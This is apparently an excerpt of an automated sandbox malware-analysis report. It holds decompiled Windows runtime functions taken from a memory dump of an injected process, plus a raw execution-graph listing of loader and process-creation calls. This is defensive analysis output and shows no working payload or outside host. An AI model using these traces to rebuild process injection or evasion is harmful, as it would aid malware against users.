                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                        • Instruction ID: d8377a80a2f037536542079f862cd2feedef3f398b58f8b542c12a82f1a0fa51
                        • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                        • Instruction Fuzzy Hash: 19D0A9B58111C09ADB01AB10C32475833B3BB0020AF782366A4560AA92CBBA8A0AC600
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E1ED1AAB0() {
                        				intOrPtr* _t4;
                        
                        				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                        				if(_t4 != 0) {
                        					if( *_t4 == 0) {
                        						goto L1;
                        					} else {
                        						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                        					}
                        				} else {
                        					L1:
                        					return 0x7ffe0030;
                        				}
                        			}





                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                        • Instruction ID: 03c250792cc5f858f6c18a9572b76c46a2d6a0c5b40f9cc7bfa89df66c2db7d3
                        • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                        • Instruction Fuzzy Hash: 96D0E935352A81CFD616CB19D964B0573A5BB44B44FC50590E545CB765E62CE944CA01
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E1ED8A537(intOrPtr _a4, intOrPtr _a8) {
                        
                        				return L1ED28E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                        			}



                        0x1ed8a553

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true

                        C-Code - Quality: 100%
                        			E1ED0DB40() {
                        				signed int* _t3;
                        				void* _t5;
                        
                        				_t3 = L1ED24620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                        				if(_t3 == 0) {
                        					return 0;
                        				} else {
                        					 *_t3 =  *_t3 | 0x00000400;
                        					return _t3;
                        				}
                        			}






                        C-Code - Quality: 100%
                        			E1ED336CC(void* __ecx) {
                        
                        				if(__ecx > 0x7fffffff) {
                        					return 0;
                        				} else {
                        					return L1ED24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                        				}
                        			}




                        C-Code - Quality: 100%
                        			E1ED176E2(void* __ecx) {
                        				void* _t5;
                        
                        				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                        					return L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                        				}
                        				return _t5;
                        			}





                        C-Code - Quality: 100%
                        			E1ED0AD30(intOrPtr _a4) {
                        
                        				return L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                        			}




                        C-Code - Quality: 100%
                        			E1ED23A1C(intOrPtr _a4) {
                        				void* _t5;
                        
                        				return L1ED24620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                        			}





                        C-Code - Quality: 100%
                        			E1ED27D50() {
                        				intOrPtr* _t3;
                        
                        				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                        				if(_t3 != 0) {
                        					return  *_t3;
                        				} else {
                        					return _t3;
                        				}
                        			}





                        C-Code - Quality: 100%
                        			E1ED32ACB() {
                        				void* _t5;
                        
                        				return E1ED1EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        			}




                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8272f9ff9fdbf2bdefa762f021625eebfb26a3eee7d6ded2666db7917840ec57
                        • Instruction ID: 1d93397d34a2bc825a66ca15cc79e503a0c793b7fed5f44f56676bd023ebcbb5
                        • Opcode Fuzzy Hash: 8272f9ff9fdbf2bdefa762f021625eebfb26a3eee7d6ded2666db7917840ec57
                        • Instruction Fuzzy Hash: C290026124100807D541715A841471B0016DBD4A41F91C111E0014534D865789E67AF1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fdf60d4170c12ac8d197bca9c2c3902dedd2eebef5a624586b6e89f5c366d9a8
                        • Instruction ID: 47d211e0fcdce10436012da7c6a4039eed9d87f71ea9299f78deff061a2f0952
                        • Opcode Fuzzy Hash: fdf60d4170c12ac8d197bca9c2c3902dedd2eebef5a624586b6e89f5c366d9a8
                        • Instruction Fuzzy Hash: 6A90026130100407D503615A441461B0019DBD5785FD1C112E1414535D866689D3B572
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 087e0df053877c78f59ecbdf54fc9ce1c20274eaead5a4d76c7d01cc5cdc05c1
                        • Instruction ID: 283bbbc327367069fe1e83cad5976994eee51c20fb673e1f7058811856147240
                        • Opcode Fuzzy Hash: 087e0df053877c78f59ecbdf54fc9ce1c20274eaead5a4d76c7d01cc5cdc05c1
                        • Instruction Fuzzy Hash: 139002A1601140474941B15A480441B5025ABE57413D1C221E0444530C86A988D6A6B5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 84716a340bb8de34f1bfdbae646c811540d2b0321e0441fb1918cd0b59c45617
                        • Instruction ID: a9b7e2249cff49935c09693839b6beed0479636276032017312a3526a8f67044
                        • Opcode Fuzzy Hash: 84716a340bb8de34f1bfdbae646c811540d2b0321e0441fb1918cd0b59c45617
                        • Instruction Fuzzy Hash: A790027124100407D542715A440461B0019ABD4681FD1C112E0414534E86968AD7BEB1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c3c097e83a826122ac6720d1f10a599ff0163f10e1d5e5118f4ca301af78258b
                        • Instruction ID: 939ad45f05c615c5db93929c04c00424b4e93a4431b787a1e0baddb0d10fdb8a
                        • Opcode Fuzzy Hash: c3c097e83a826122ac6720d1f10a599ff0163f10e1d5e5118f4ca301af78258b
                        • Instruction Fuzzy Hash: 429002A121100047D505615A440471B00559BE5641F91C112E2144534CC56A8CE26575
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9bcaf43279973ec3750fff93e6d13540af725ac19b451831001d7ca9f56b0c4e
                        • Instruction ID: 93869a2eebba3dc174f6b5ed6b1b25fbf57a4deda84daa3a62e1d553bdd604f9
                        • Opcode Fuzzy Hash: 9bcaf43279973ec3750fff93e6d13540af725ac19b451831001d7ca9f56b0c4e
                        • Instruction Fuzzy Hash: DE9002A120140407D541655A480461B00159BD4742F91C111E2054535E8A6A8CD27575
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                        • Instruction ID: fe218b1a8dfde410d8d519e142a9f792e155348614521ce586238253635a69a2
                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                        • Instruction Fuzzy Hash:
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 53%
                        			E1ED9FDDA(intOrPtr* __edx, intOrPtr _a4) {
                        				void* _t7;
                        				intOrPtr _t9;
                        				intOrPtr _t10;
                        				intOrPtr* _t12;
                        				intOrPtr* _t13;
                        				intOrPtr _t14;
                        				intOrPtr* _t15;
                        
                        				_t13 = __edx;
                        				_push(_a4);
                        				_t14 =  *[fs:0x18];
                        				_t15 = _t12;
                        				_t7 = E1ED4CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                        				_push(_t13);
                        				E1ED95720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                        				_t9 =  *_t15;
                        				if(_t9 == 0xffffffff) {
                        					_t10 = 0;
                        				} else {
                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                        				}
                        				_push(_t10);
                        				_push(_t15);
                        				_push( *((intOrPtr*)(_t15 + 0xc)));
                        				_push( *((intOrPtr*)(_t14 + 0x24)));
                        				return E1ED95720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                        			}











                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1ED9FDFA
                        Strings
                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1ED9FE01
                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1ED9FE2B
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                        • API String ID: 885266447-3903918235
                        • Opcode ID: 10e92d44dc8e608059ee6314cad7680d63b8124afdf8df60b35aa2385f409a79
                        • Instruction ID: 546e5ac1c8b386dddac4584aaeda1bcac3af2b61ed068f86f8e53da8eda9d4e3
                        • Opcode Fuzzy Hash: 10e92d44dc8e608059ee6314cad7680d63b8124afdf8df60b35aa2385f409a79
                        • Instruction Fuzzy Hash: 20F0F036600141BFEB240A56DC01F67BB6BEB44730F240324FA28566E1EA62F960A7F0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:6.8%
                        Dynamic/Decrypted Code Coverage:1.6%
                        Signature Coverage:0%
                        Total number of Nodes:1132
                        Total number of Limit Nodes:144

                        Graph

34522->34601 34651 6341d0 26 API calls 34524->34651 34525 63f0f0 34527 63f101 34525->34527 34648 63ec60 10 API calls 34525->34648 34531 63f124 34527->34531 34535 63f11b 34527->34535 34649 63edc0 10 API calls 34527->34649 34528 63f0b6 34532 644a50 10 API calls 34528->34532 34606 63eed0 34531->34606 34536 63f0c7 34532->34536 34533 63f16d 34533->34367 34650 63ef40 13 API calls 34535->34650 34539 644a50 10 API calls 34536->34539 34542 63f0d8 34539->34542 34633 63efa0 34542->34633 34547 644a50 10 API calls 34547->34524 34549 63f4bd 34548->34549 34555 649fd0 34549->34555 34552 63f505 34552->34510 34556 64af70 LdrLoadDll 34555->34556 34557 649fec 34556->34557 34565 48199a0 LdrInitializeThunk 34557->34565 34558 63f4fe 34558->34552 34560 64a020 34558->34560 34561 64af70 LdrLoadDll 34560->34561 34562 64a03c 34561->34562 34566 4819780 LdrInitializeThunk 34562->34566 34563 63f52e 34563->34510 34565->34558 34566->34563 34568 64bfa0 2 API calls 34567->34568 34569 6498a7 34568->34569 34588 639310 34569->34588 34571 6498c2 34572 649900 34571->34572 34573 6498e9 34571->34573 34576 64bd50 2 API calls 34572->34576 34574 64bdd0 2 API calls 34573->34574 34575 6498f6 34574->34575 34575->34513 34577 64993a 34576->34577 34578 64bd50 2 API calls 34577->34578 34579 649953 34578->34579 34585 649bf4 34579->34585 34594 64bd90 LdrLoadDll 34579->34594 34581 649bd9 34582 649be0 34581->34582 34581->34585 34583 64bdd0 2 API calls 34582->34583 34584 649bea 34583->34584 34584->34513 34586 64bdd0 2 API calls 34585->34586 34587 649c49 34586->34587 34587->34513 34589 639335 34588->34589 34590 63acf0 LdrLoadDll 34589->34590 34591 639368 34590->34591 34592 63cf20 3 API calls 34591->34592 34593 63938d 34591->34593 34592->34593 34593->34571 34594->34581 34596 64af70 LdrLoadDll 34595->34596 34597 649ebc 34596->34597 34600 4819840 LdrInitializeThunk 34597->34600 34598 63f6ae 34598->34367 34600->34598 34603 63dfd8 34601->34603 34605 63e098 34601->34605 34602 63e031 34602->34525 34603->34602 34604 644a50 10 API 
calls 34603->34604 34604->34605 34605->34525 34607 63eee8 34606->34607 34611 63ef37 34606->34611 34607->34611 34652 63faa0 34607->34652 34609 63ef23 34609->34611 34664 63fcf0 13 API calls 34609->34664 34612 63ee00 34611->34612 34613 63ee1e 34612->34613 34615 63eeb8 34612->34615 34614 644a50 10 API calls 34613->34614 34613->34615 34614->34615 34615->34533 34616 63eaa0 34615->34616 34617 63eabc 34616->34617 34631 63eb9b 34616->34631 34620 64a4a0 2 API calls 34617->34620 34617->34631 34618 63ec31 34619 63ec4e 34618->34619 34621 644a50 10 API calls 34618->34621 34619->34524 34619->34547 34622 63ead7 34620->34622 34621->34619 34625 63d150 4 API calls 34622->34625 34623 63d150 4 API calls 34624 63ec0b 34623->34624 34624->34618 34627 63d3d0 5 API calls 34624->34627 34626 63eb0f 34625->34626 34628 63b040 LdrLoadDll 34626->34628 34627->34618 34629 63eb20 34628->34629 34630 63b040 LdrLoadDll 34629->34630 34630->34631 34631->34618 34631->34623 34632->34528 34665 643d70 34633->34665 34635 63efad 34703 642a50 34635->34703 34637 63efb3 34739 640e60 34637->34739 34639 63efb9 34762 641bd0 34639->34762 34641 63efc1 34796 642d70 34641->34796 34643 63efc7 34799 6433e0 34643->34799 34648->34527 34649->34535 34650->34531 34651->34533 34653 63fac5 34652->34653 34654 63b040 LdrLoadDll 34653->34654 34655 63fb80 34654->34655 34656 63b040 LdrLoadDll 34655->34656 34657 63fba4 34656->34657 34658 644a50 10 API calls 34657->34658 34660 63fbf7 34658->34660 34659 63fcb1 34659->34609 34660->34659 34661 63b040 LdrLoadDll 34660->34661 34662 63fc5e 34661->34662 34663 644a50 10 API calls 34662->34663 34663->34659 34664->34611 34666 643d98 34665->34666 34667 63b040 LdrLoadDll 34666->34667 34668 643dc7 34667->34668 34669 63cf20 3 API calls 34668->34669 34671 643dfa 34669->34671 34670 643e01 34670->34635 34671->34670 34672 63b040 LdrLoadDll 34671->34672 34673 643e29 34672->34673 34674 63b040 LdrLoadDll 34673->34674 34675 643e4d 34674->34675 34676 63cfe0 2 API calls 34675->34676 34677 643e71 34676->34677 
34678 643eb3 34677->34678 34831 6436c0 34677->34831 34682 63b040 LdrLoadDll 34678->34682 34680 643e8a 34681 644036 34680->34681 34838 643ab0 12 API calls 34680->34838 34681->34635 34684 643ed3 34682->34684 34685 63cfe0 2 API calls 34684->34685 34686 643ef7 34685->34686 34687 643f3d 34686->34687 34688 643f14 34686->34688 34690 6436c0 10 API calls 34686->34690 34689 63cfe0 2 API calls 34687->34689 34688->34681 34839 643ab0 12 API calls 34688->34839 34692 643f6d 34689->34692 34690->34688 34693 643fb3 34692->34693 34694 643f8a 34692->34694 34695 6436c0 10 API calls 34692->34695 34697 63cfe0 2 API calls 34693->34697 34694->34681 34840 643ab0 12 API calls 34694->34840 34695->34694 34698 644012 34697->34698 34699 64405b 34698->34699 34700 64402f 34698->34700 34702 6436c0 10 API calls 34698->34702 34699->34635 34700->34681 34841 643ab0 12 API calls 34700->34841 34702->34700 34704 642ab4 34703->34704 34705 63b040 LdrLoadDll 34704->34705 34706 642b81 34705->34706 34707 63cf20 3 API calls 34706->34707 34709 642bb4 34707->34709 34708 642bbb 34708->34637 34709->34708 34710 63b040 LdrLoadDll 34709->34710 34711 642be3 34710->34711 34712 63cfe0 2 API calls 34711->34712 34713 642c23 34712->34713 34714 6436c0 10 API calls 34713->34714 34736 642d43 34713->34736 34715 642c40 34714->34715 34716 642d52 34715->34716 34842 642870 34715->34842 34717 64a4a0 2 API calls 34716->34717 34719 642d5c 34717->34719 34719->34637 34720 642c58 34720->34716 34721 642c63 34720->34721 34722 64bfa0 2 API calls 34721->34722 34723 642c8c 34722->34723 34724 642c95 34723->34724 34725 642cab 34723->34725 34726 64a4a0 2 API calls 34724->34726 34871 642760 CoInitialize 34725->34871 34729 642c9f 34726->34729 34728 642cb9 34730 64a1b0 2 API calls 34728->34730 34729->34637 34738 642cd7 34730->34738 34731 642d32 34732 64a4a0 2 API calls 34731->34732 34734 642d3c 34732->34734 34735 64bdd0 2 API calls 34734->34735 34735->34736 34736->34637 34737 64a1b0 2 API calls 34737->34738 34738->34731 34738->34737 34873 642690 10 
API calls 34738->34873 34740 640e88 34739->34740 34741 64bfa0 2 API calls 34740->34741 34743 640ee8 34741->34743 34742 640ef1 34742->34639 34743->34742 34874 640b30 34743->34874 34745 640f18 34746 640f36 34745->34746 34909 6417c0 13 API calls 34745->34909 34751 640f50 34746->34751 34911 63ae40 LdrLoadDll 34746->34911 34748 640f2a 34910 6417c0 13 API calls 34748->34910 34752 640b30 12 API calls 34751->34752 34753 640f7b 34752->34753 34754 640f9a 34753->34754 34912 6417c0 13 API calls 34753->34912 34756 640fb4 34754->34756 34914 63ae40 LdrLoadDll 34754->34914 34759 64bdd0 2 API calls 34756->34759 34757 640f8e 34913 6417c0 13 API calls 34757->34913 34761 640fbe 34759->34761 34761->34639 34763 641bf6 34762->34763 34764 641c8e 34763->34764 34765 641c08 34763->34765 34770 641c6c 34764->34770 34924 642d90 34764->34924 34766 63b040 LdrLoadDll 34765->34766 34769 641c19 34766->34769 34772 641c37 34769->34772 34774 63b040 LdrLoadDll 34769->34774 34773 641c86 34770->34773 34929 6488e0 34770->34929 34771 641ccb 34788 641d20 34771->34788 34955 641380 34771->34955 34777 63b040 LdrLoadDll 34772->34777 34773->34641 34774->34772 34776 641ce3 34779 641d2c 34776->34779 34780 641cea 34776->34780 34778 641c5b 34777->34778 34781 644a50 10 API calls 34778->34781 34782 63b040 LdrLoadDll 34779->34782 34783 641cf2 34780->34783 34784 641d0f 34780->34784 34781->34770 34789 641d3d 34782->34789 34786 64bdd0 2 API calls 34783->34786 34785 64bdd0 2 API calls 34784->34785 34785->34788 34787 641d03 34786->34787 34787->34641 34788->34641 34966 640fe0 34789->34966 34791 641e3f 34792 64bdd0 2 API calls 34791->34792 34793 641e46 34792->34793 34793->34641 34794 641d57 34794->34791 34972 6416f0 11 API calls 34794->34972 34797 642d81 34796->34797 34798 641bd0 13 API calls 34796->34798 34797->34643 34798->34797 34800 6433e9 34799->34800 34801 63acf0 LdrLoadDll 34800->34801 34802 643418 34801->34802 34803 644e50 LdrLoadDll 34802->34803 34822 63efd3 34802->34822 34804 643442 34803->34804 34805 644e50 
LdrLoadDll 34804->34805 34806 643455 34805->34806 34807 644e50 LdrLoadDll 34806->34807 34808 643468 34807->34808 34809 644e50 LdrLoadDll 34808->34809 34810 64347b 34809->34810 34811 644e50 LdrLoadDll 34810->34811 34812 643491 34811->34812 34813 644e50 LdrLoadDll 34812->34813 34814 6434a4 34813->34814 34815 644e50 LdrLoadDll 34814->34815 34816 6434b7 34815->34816 34817 644e50 LdrLoadDll 34816->34817 34818 6434ca 34817->34818 34819 644e50 LdrLoadDll 34818->34819 34820 6434df 34819->34820 34821 6436c0 10 API calls 34820->34821 34820->34822 34823 643561 34821->34823 34825 6460e0 34822->34825 34823->34822 35003 642fa0 34823->35003 34826 646138 34825->34826 34830 63efdf 34826->34830 35008 645d40 34826->35008 34828 6461a3 34828->34830 35046 645ff0 34828->35046 34830->34522 34833 643735 34831->34833 34832 6438c2 34832->34680 34833->34832 34834 644a50 10 API calls 34833->34834 34835 6438a2 34834->34835 34835->34832 34836 644a50 10 API calls 34835->34836 34837 6438b3 34836->34837 34837->34680 34838->34678 34839->34687 34840->34693 34841->34699 34843 64288c 34842->34843 34844 63acf0 LdrLoadDll 34843->34844 34845 6428a7 34844->34845 34846 6428b0 34845->34846 34847 644e50 LdrLoadDll 34845->34847 34846->34720 34848 6428c7 34847->34848 34849 644e50 LdrLoadDll 34848->34849 34850 6428dc 34849->34850 34851 644e50 LdrLoadDll 34850->34851 34852 6428ef 34851->34852 34853 644e50 LdrLoadDll 34852->34853 34854 642902 34853->34854 34855 644e50 LdrLoadDll 34854->34855 34856 642918 34855->34856 34857 644e50 LdrLoadDll 34856->34857 34858 64292b 34857->34858 34859 63acf0 LdrLoadDll 34858->34859 34860 642954 34859->34860 34861 644e50 LdrLoadDll 34860->34861 34870 6429f0 34860->34870 34862 642978 34861->34862 34863 63acf0 LdrLoadDll 34862->34863 34864 6429ad 34863->34864 34865 644e50 LdrLoadDll 34864->34865 34864->34870 34866 6429ca 34865->34866 34867 644e50 LdrLoadDll 34866->34867 34868 6429dd 34867->34868 34869 644e50 LdrLoadDll 34868->34869 34869->34870 34870->34720 34872 6427c5 34871->34872 
34872->34728 34873->34738 34875 640bc8 34874->34875 34876 63b040 LdrLoadDll 34875->34876 34877 640c66 34876->34877 34878 63b040 LdrLoadDll 34877->34878 34879 640c81 34878->34879 34880 63cfe0 2 API calls 34879->34880 34881 640ca6 34880->34881 34882 640e11 34881->34882 34915 64a130 34881->34915 34883 640e22 34882->34883 34886 63faa0 10 API calls 34882->34886 34883->34745 34886->34883 34887 640e07 34888 64a4a0 2 API calls 34887->34888 34888->34882 34889 640cdc 34890 64a4a0 2 API calls 34889->34890 34891 640d1f 34890->34891 34920 64c070 LdrLoadDll 34891->34920 34893 640d58 34894 640d5f 34893->34894 34895 63cfe0 2 API calls 34893->34895 34894->34745 34896 640d76 34895->34896 34896->34883 34897 64a130 2 API calls 34896->34897 34898 640d9b 34897->34898 34899 640da2 34898->34899 34900 640dee 34898->34900 34902 64a4a0 2 API calls 34899->34902 34901 64a4a0 2 API calls 34900->34901 34903 640df8 34901->34903 34904 640dac 34902->34904 34903->34745 34921 6400c0 LdrLoadDll 34904->34921 34906 640dc9 34906->34883 34922 640890 10 API calls 34906->34922 34908 640ddf 34908->34745 34909->34748 34910->34746 34911->34751 34912->34757 34913->34754 34914->34756 34916 64af70 LdrLoadDll 34915->34916 34917 64a14c 34916->34917 34923 4819650 LdrInitializeThunk 34917->34923 34918 640cd1 34918->34887 34918->34889 34920->34893 34921->34906 34922->34908 34923->34918 34925 63b040 LdrLoadDll 34924->34925 34926 642dac 34925->34926 34927 642e65 34926->34927 34928 644a50 10 API calls 34926->34928 34927->34770 34928->34927 34930 6488ee 34929->34930 34931 6488f5 34929->34931 34930->34771 34932 63acf0 LdrLoadDll 34931->34932 34933 648920 34932->34933 34934 648a74 34933->34934 34935 64bfa0 2 API calls 34933->34935 34934->34771 34936 648938 34935->34936 34936->34934 34973 641180 LdrLoadDll 34936->34973 34938 648956 34939 644e50 LdrLoadDll 34938->34939 34940 64896c 34939->34940 34941 644e50 LdrLoadDll 34940->34941 34942 648988 34941->34942 34943 644e50 LdrLoadDll 34942->34943 34944 6489a4 34943->34944 34945 
644e50 LdrLoadDll 34944->34945 34946 6489c3 34945->34946 34947 644e50 LdrLoadDll 34946->34947 34948 6489df 34947->34948 34949 644e50 LdrLoadDll 34948->34949 34950 6489fb 34949->34950 34951 644e50 LdrLoadDll 34950->34951 34952 648a21 34951->34952 34953 64bdd0 2 API calls 34952->34953 34954 648a64 34952->34954 34953->34934 34954->34771 34957 6413a4 34955->34957 34956 6415c0 34956->34776 34957->34956 34958 6414d2 34957->34958 34961 641578 34957->34961 34960 644a50 10 API calls 34958->34960 34959 6415b1 34959->34776 34963 6414e2 34960->34963 34961->34959 34962 644a50 10 API calls 34961->34962 34962->34959 34963->34956 34964 644a50 10 API calls 34963->34964 34965 641569 34964->34965 34965->34776 34967 641006 34966->34967 34968 63b040 LdrLoadDll 34967->34968 34969 64103c 34968->34969 34974 63d310 34969->34974 34971 6410ff 34971->34794 34972->34794 34973->34938 34975 63d327 34974->34975 34983 63f710 34975->34983 34979 63d39b 34980 63d3a2 34979->34980 34994 64a2b0 LdrLoadDll 34979->34994 34980->34971 34982 63d3b5 34982->34971 34984 63f735 34983->34984 34995 6381a0 34984->34995 34986 63f759 34987 63d36f 34986->34987 34988 644a50 10 API calls 34986->34988 34990 64bdd0 2 API calls 34986->34990 35002 63f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 34986->35002 34991 64a6f0 34987->34991 34988->34986 34990->34986 34992 64a70f CreateProcessInternalW 34991->34992 34993 64af70 LdrLoadDll 34991->34993 34992->34979 34993->34992 34994->34982 34996 63829f 34995->34996 34997 6381b5 34995->34997 34996->34986 34997->34996 34998 644a50 10 API calls 34997->34998 35000 638222 34998->35000 34999 638249 34999->34986 35000->34999 35001 64bdd0 LdrLoadDll RtlFreeHeap 35000->35001 35001->34999 35002->34986 35004 6433ce 35003->35004 35005 643058 35003->35005 35004->34823 35005->35004 35006 642e80 LdrLoadDll 35005->35006 35007 644a50 10 API calls 35005->35007 35006->35005 35007->35005 35010 645d56 35008->35010 35012 645d7f 35008->35012 35009 645de8 35011 645e09 35009->35011 35014 644e50 
LdrLoadDll 35009->35014 35017 63acf0 LdrLoadDll 35010->35017 35015 645e2b 35011->35015 35018 644e50 LdrLoadDll 35011->35018 35013 645db3 35012->35013 35021 63acf0 LdrLoadDll 35012->35021 35013->35009 35023 63acf0 LdrLoadDll 35013->35023 35014->35011 35016 645e4d 35015->35016 35019 644e50 LdrLoadDll 35015->35019 35020 645e6e 35016->35020 35022 644e50 LdrLoadDll 35016->35022 35017->35012 35018->35015 35019->35016 35024 645e90 35020->35024 35025 644e50 LdrLoadDll 35020->35025 35021->35013 35022->35020 35023->35009 35026 645eb2 35024->35026 35028 644e50 LdrLoadDll 35024->35028 35025->35024 35027 645ed3 35026->35027 35029 644e50 LdrLoadDll 35026->35029 35030 645ef5 35027->35030 35031 644e50 LdrLoadDll 35027->35031 35028->35026 35029->35027 35032 645f17 35030->35032 35033 644e50 LdrLoadDll 35030->35033 35031->35030 35034 645f39 35032->35034 35036 644e50 LdrLoadDll 35032->35036 35033->35032 35035 645f5b 35034->35035 35037 644e50 LdrLoadDll 35034->35037 35038 645f7d 35035->35038 35039 644e50 LdrLoadDll 35035->35039 35036->35034 35037->35035 35040 645f9f 35038->35040 35041 644e50 LdrLoadDll 35038->35041 35039->35038 35042 645fc1 